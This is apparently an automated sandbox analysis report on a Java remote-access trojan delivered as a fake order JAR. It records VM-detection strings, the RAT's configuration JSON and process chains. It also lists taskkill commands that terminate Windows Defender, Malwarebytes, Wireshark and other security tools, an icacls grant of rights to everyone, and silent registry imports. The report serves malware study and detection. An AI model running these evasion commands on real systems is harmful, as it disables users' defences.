Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\nio.dll Jump to dropped file
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe API coverage: 1.2 %
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: javaw.exe, 00000006.00000002.2845247996.0000000004C02000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: BDescription=Microsoft Hyper-V Virtualization Infrastructure Driver
Source: javaw.exe, 00000006.00000002.2851634120.000000000A398000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2845247996.0000000004C02000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.000000000A3E5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2845247996.0000000004F2D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: DeviceName=Microsoft Hyper-V Virtualization Infrastructure Driver
Source: javaw.exe, 00000006.00000002.2845247996.0000000004C02000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Adevicename=microsoft hyper-v virtualization infrastructure driver
Source: xcopy.exe, 00000015.00000003.1705497311.00000000004DE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: JVM version %s (%s, %s)VirtualMachineImpl.cRedefineClassesGetTopThreadGroupsJNI_FALSENewStringUTF;classTrack.csignaturessignature bagDeleteWeakGlobalRefclassTrack tableloaded classesAttempting to insert duplicate classKlassNodesignatureNewWeakGlobalRefloaded classes arraycommonRef.cSetTagFreeing %d (%x)
Source: java.exe, 00000002.00000002.1635572608.00000000013FB000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2843520810.0000000000D48000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843639949.0000000001614000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [Ljava/lang/VirtualMachineError;
Source: java.exe, 00000007.00000003.1670111593.00000000154F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: org/omg/CORBA/OMGVMCID.classPK
Source: java.exe, 00000002.00000002.1635572608.00000000013FB000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2843520810.0000000000D48000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843639949.0000000001614000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: cjava/lang/VirtualMachineError
Source: wscript.exe, 00000005.00000003.1666098782.0000000006AF6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: java.exe, 00000007.00000002.2845228924.000000000542F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWARE
Source: javaw.exe, 00000006.00000002.2845247996.0000000004C02000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ADeviceName=Microsoft Hyper-V Virtualization Infrastructure Driver
Source: java.exe, 00000007.00000002.2845228924.0000000005189000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: {"NETWORK":[{"PORT":7777,"DNS":"127.0.0.1"}],"INSTALL":false,"MODULE_PATH":"zS/lq/BTk.GI","PLUGIN_FOLDER":"DdWDtpinxpf","JRE_FOLDER":"HSIROD","JAR_FOLDER":"fUTkALeaTxM","JAR_EXTENSION":"Vybgol","ENCRYPT_KEY":"cPFjgddXIBcXBCIseEuXTZjwi","DELAY_INSTALL":2,"NICKNAME":"User","VMWARE":false,"PLUGIN_EXTENSION":"DhjWU","WEBSITE_PROJECT":"https://jrat.io","JAR_NAME":"uiylKSALYJr","JAR_
Source: java.exe, 00000002.00000003.1625026729.0000000015352000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1664952445.0000000014EC6000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1670111593.00000000154F2000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1755381709.000000000288D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: java/lang/VirtualMachineError.classPK
Source: java.exe, 00000007.00000002.2843639949.00000000015EB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllWN
Source: java.exe, 00000007.00000002.2845228924.0000000005189000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: {"NETWORK":[{"PORT":7777,"DNS":"127.0.0.1"}],"INSTALL":false,"MODULE_PATH":"zS/lq/BTk.GI","PLUGIN_FOLDER":"DdWDtpinxpf","JRE_FOLDER":"HSIROD","JAR_FOLDER":"fUTkALeaTxM","JAR_EXTENSION":"Vybgol","ENCRYPT_KEY":"cPFjgddXIBcXBCIseEuXTZjwi","DELAY_INSTALL":2,"NICKNAME":"User","VMWARE":false,"PLUGIN_EXTENSION":"DhjWU","WEBSITE_PROJECT":"https://jrat.io","JAR_NAME":"uiylKSALYJr","JAR_REGISTRY":"WLyQyhWoosi","DELAY_CONNECT":2,"VBOX":false}
Source: javaw.exe, 00000006.00000002.2845247996.0000000004B3D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: /DeviceName=Microsoft Hyper-V Generation Counter
Source: java.exe, 00000007.00000002.2845228924.0000000005189000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: {"NETWORK":[{"PORT":7777,"DNS":"127.0.0.1"}],"INSTALL":false,"MODULE_PATH":"zS/lq/BTk.GI","PLUGIN_FOLDER":"DdWDtpinxpf","JRE_FOLDER":"HSIROD","JAR_FOLDER":"fUTkALeaTxM","JAR_EXTENSION":"Vybgol","ENCRYPT_KEY":"cPFjgddXIBcXBCIseEuXTZjwi","DELAY_INSTALL":2,"NICKNAME":"User","VMWARE":false,"PLUGIN_EXTENSION":"DhjWU","WEBSITE_PROJECT":"https://jrat.io","JAR_NAME":"uiylKSALYJr","JAR_
Source: java.exe, 00000002.00000002.1635572608.00000000013FB000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2843520810.0000000000D48000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: javaw.exe, 00000006.00000002.2851634120.000000000A398000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2845247996.0000000004C02000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.000000000A3E5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2845247996.0000000004F2D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Description=Microsoft Hyper-V Virtualization Infrastructure Driver
Source: javaw.exe, 00000006.00000002.2845247996.0000000004B3D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: /devicename=microsoft hyper-v generation counter
Source: java.exe, 00000007.00000002.2845228924.000000000524C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: {"NETWORK":[{"PORT":7777,"DNS":"127.0.0.1"}],"INSTALL":false,"MODULE_PATH":"zS/lq/BTk.GI","PLUGIN_FOLDER":"DdWDtpinxpf","JRE_FOLDER":"HSIROD","JAR_FOLDER":"fUTkALeaTxM","JAR_EXTENSION":"Vybgol","ENCRYPT_KEY":"cPFjgddXIBcXBCIseEuXTZjwi","DELAY_INSTALL":2,"NICKNAME":"User","VMWARE":false,"PLUGIN_EXTENSION":"DhjWU","WEBSITE_PROJECT":"https://jrat.io","JAR_NAME":"uiylKSALYJr","JAR_REGISTRY":"WLyQyhWoosi","DELAY_CONNECT":2,"VBOX":false}
Source: java.exe, 00000007.00000003.1670111593.00000000154F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: com/sun/corba/se/impl/util/SUNVMCID.classPK
Source: java.exe, 00000007.00000003.1670111593.00000000154F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: &com/sun/corba/se/impl/util/SUNVMCID.classPK
Source: xcopy.exe, 00000015.00000003.1705497311.00000000004DE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VirtualMachineImpl.c
Source: javaw.exe, 00000006.00000002.2845247996.0000000004C02000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Bdescription=microsoft hyper-v virtualization infrastructure driver
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Process information queried: ProcessInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_73A92C97 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_73A92C97
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_73A945FB LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 6_2_73A945FB
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_73A91244 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_73A91244
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Memory protected: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM UserAccountControlSettings.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ProcessHacker.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MSASCui.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MsMpEng.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MpUXSrv.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM NisSrv.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ConfigSecurityPolicy.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM wireshark.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM tshark.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM text2pcap.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM rawshark.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM editcap.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM dumpcap.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM capinfos.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbam.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbamscheduler.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbamservice.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM AdAwareService.exe /T /F Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe "C:\Program Files (x86)\Java\jre-1.8\bin\java.exe" -javaagent:"C:\Users\user\AppData\Local\Temp\jartracer.jar" -jar "C:\Users\user\Desktop\NewOrder - P2D041197.jar" Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Process created: C:\Windows\SysWOW64\wscript.exe wscript C:\Users\user\zbrspjjraf.js Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe "C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\krmyqqmohp.txt" Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe "C:\Program Files (x86)\Java\jre-1.8\bin\java.exe" -jar C:\Users\user\AppData\Local\Temp\_0.337891030941391956323023258775833856.class Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4614601071766058238.vbs Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4410908985771939559.vbs Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "C:\Program Files (x86)\Java\jre-1.8" "C:\Users\user\AppData\Roaming\Oracle\" /e Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c regedit.exe /s C:\Users\user\AppData\Local\Temp\mNuEFMHNfs1412424943545557855.reg Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\cimv2 Path Win32_PnpSignedDriver Get /Format:List Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive508991219844214216.vbs
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive6937263458449411198.vbs
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "C:\Program Files (x86)\Java\jre-1.8" "C:\Users\user\AppData\Roaming\Oracle\" /e
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4614601071766058238.vbs
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive508991219844214216.vbs
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4410908985771939559.vbs
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive6937263458449411198.vbs
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\regedit.exe regedit.exe /s C:\Users\user\AppData\Local\Temp\mNuEFMHNfs1412424943545557855.reg
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM UserAccountControlSettings.exe /T /F
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ProcessHacker.exe /T /F
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /F
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MSASCui.exe /T /F
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MsMpEng.exe /T /F
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MpUXSrv.exe /T /F
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM NisSrv.exe /T /F
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ConfigSecurityPolicy.exe /T /F
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM wireshark.exe /T /F
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM tshark.exe /T /F
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM text2pcap.exe /T /F
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM rawshark.exe /T /F
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM editcap.exe /T /F
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM dumpcap.exe /T /F
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM capinfos.exe /T /F
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbam.exe /T /F
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbamscheduler.exe /T /F
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbamservice.exe /T /F
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM AdAwareService.exe /T /F
Source: javaw.exe, 00000006.00000002.2845247996.0000000004F14000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.000000000A3CC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: /{"ACTIVE_WINDOW":"Program Manager","COMMAND":5}S-Uninstall.exe"],"NAME":"MCShield Anti-Malware Tool"},{"PROCESS":["SDScan.exe","SDFSSvc.exe","SDWelcome.exe","SDTray.exe"],"NAME":"SPYBOT AntiMalware"},{"PROCESS":["UnThreat.exe","utsvc.exe"],"NAME":"UnThreat Antivirus"},{"PROCESS":["FortiClient.exe","fcappdb.exe","FCDBlog.exe","FCHelper64.exe","fmon.exe","FortiESNAC.exe","FortiProxy.exe","FortiSSLVPNdaemon.exe","FortiTray.exe","FortiFW.exe","FortiClient_Diagnostic_Tool.exe","av_task.exe"],"NAME":"FortiClient"},{"PROCESS":["CertReg.exe","FilMsg.exe","FilUp.exe","filwscc.exe","filwscc.exe","psview.exe","quamgr.exe","quamgr.exe","schmgr.exe","schmgr.exe","twsscan.exe","twssrv.exe","UserReg.exe"],"NAME":"Twister Antivirus"}],"DELAY_CONNECT":2,"SERVER_PATH":"C:\\Users\\user\\AppData\\Roaming\\krmyqqmohp.txt","VBOX":false,"RAM":"8.0 GB"}],"NAME":"VIPRE Security 2015"},{"PROCESS":["bavhm.exe","BavSvc.exe","BavTray.exe","Bav.exe","BavWebClient.exe","BavUpdater.exe"],"NAME":"Baidu Antivirus 2015"},{"PROCESS":["MCShi
Source: javaw.exe, 00000006.00000002.2845247996.0000000004F14000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: {"ACTIVE_WINDOW":"Program Manager","COMMAND":5}VBOX":false,"RAM":"8.0 GB"}c.exe","psview.exe","quamgr.exe","quamgr.exe","schmgr.exe","schmgr.exe","twsscan.exe","twssrv.exe","UserReg.exe"],"NAME":"Twister Antivirus"}],"DELAY_CONNECT":2,"SERVER_PATH":"C:\\Usc4>
Source: javaw.exe, 00000006.00000002.2845247996.0000000004A29000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2845247996.0000000004BD8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: F{"ACTIVE_WINDOW":"Program Manager","COMMAND":5}
Source: javaw.exe, 00000006.00000002.2845247996.0000000004F2D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: /{"ACTIVE_WINDOW":"Program Manager","COMMAND":5}#
Source: javaw.exe, 00000006.00000002.2851634120.000000000A398000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2845247996.0000000004A29000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2845247996.0000000004BD8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: javaw.exe, 00000006.00000002.2851634120.000000000A3CC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: {"ACTIVE_WINDOW":"Program Manager","COMMAND":5}VBOX":false,"RAM":"8.0 GB"}c.exe","psview.exe","quamgr.exe","quamgr.exe","schmgr.exe","schmgr.exe","twsscan.exe","twssrv.exe","UserReg.exe"],"NAME":"Twister Antivirus"}],"DELAY_CONNECT":2,"SERVER_PATH":"C:\\Us
Source: javaw.exe, 00000006.00000002.2845247996.0000000004C02000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Managerkv;
Source: javaw.exe, 00000006.00000002.2851634120.000000000A3CC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: t/{"ACTIVE_WINDOW":"Program Manager","COMMAND":5}S-Uninstall.exe"],"NAME":"MCShield Anti-Malware Tool"},{"PROCESS":["SDScan.exe","SDFSSvc.exe","SDWelcome.exe","SDTray.exe"],"NAME":"SPYBOT AntiMalware"},{"PROCESS":["UnThreat.exe","utsvc.exe"],"NAME":"UnThreat Antivirus"},{"PROCESS":["FortiClient.exe","fcappdb.exe","FCDBlog.exe","FCHelper64.exe","fmon.exe","FortiESNAC.exe","FortiProxy.exe","FortiSSLVPNdaemon.exe","FortiTray.exe","FortiFW.exe","FortiClient_Diagnostic_Tool.exe","av_task.exe"],"NAME":"FortiClient"},{"PROCESS":["CertReg.exe","FilMsg.exe","FilUp.exe","filwscc.exe","filwscc.exe","psview.exe","quamgr.exe","quamgr.exe","schmgr.exe","schmgr.exe","twsscan.exe","twssrv.exe","UserReg.exe"],"NAME":"Twister Antivirus"}],"DELAY_CONNECT":2,"SERVER_PATH":"C:\\Users\\user\\AppData\\Roaming\\krmyqqmohp.txt","VBOX":false,"RAM":"8.0 GB"}],"NAME":"VIPRE Security 2015"},{"PROCESS":["bavhm.exe","BavSvc.exe","BavTray.exe","Bav.exe","BavWebClient.exe","BavUpdater.exe"],"NAME":"Baidu Antivirus 2015"},{"PROCESS":["MCShi
Source: javaw.exe, 00000006.00000002.2851634120.000000000A3E5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2845247996.0000000004A29000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2845247996.0000000004BD8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: /{"ACTIVE_WINDOW":"Program Manager","COMMAND":5}
Source: javaw.exe, 00000006.00000002.2845247996.0000000004A29000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2845247996.0000000004BD8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: "{"ACTIVE_WINDOW":"Program Manager"
Source: javaw.exe, 00000006.00000002.2845247996.0000000004F14000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: t/{"ACTIVE_WINDOW":"Program Manager","COMMAND":5}S-Uninstall.exe"],"NAME":"MCShield Anti-Malware Tool"},{"PROCESS":["SDScan.exe","SDFSSvc.exe","SDWelcome.exe","SDTray.exe"],"NAME":"SPYBOT AntiMalware"},{"PROCESS":["UnThreat.exe","utsvc.exe"],"NAME":"UnThreat Antivirus"},{"PROCESS":["FortiClient.exe","fcappdb.exe","FCDBlog.exe","FCHelper64.exe","fmon.exe","FortiESNAC.exe","FortiProxy.exe","FortiSSLVPNdaemon.exe","FortiTray.exe","FortiFW.exe","FortiClient_Diagnostic_Tool.exe","av_task.exe"],"NAME":"FortiClient"},{"PROCESS":["CertReg.exe","FilMsg.exe","FilUp.exe","filwscc.exe","filwscc.exe","psview.exe","quamgr.exe","quamgr.exe","schmgr.exe","schmgr.exe","twsscan.exe","twssrv.exe","UserReg.exe"],"NAME":"Twister Antivirus"}],"DELAY_CONNECT":2,"SERVER_PATH":"C:\\Users\\user\\AppData\\Roaming\\krmyqqmohp.txt","VBOX":false,"RAM":"8.0 GB"}],"NAME":"VIPRE Security 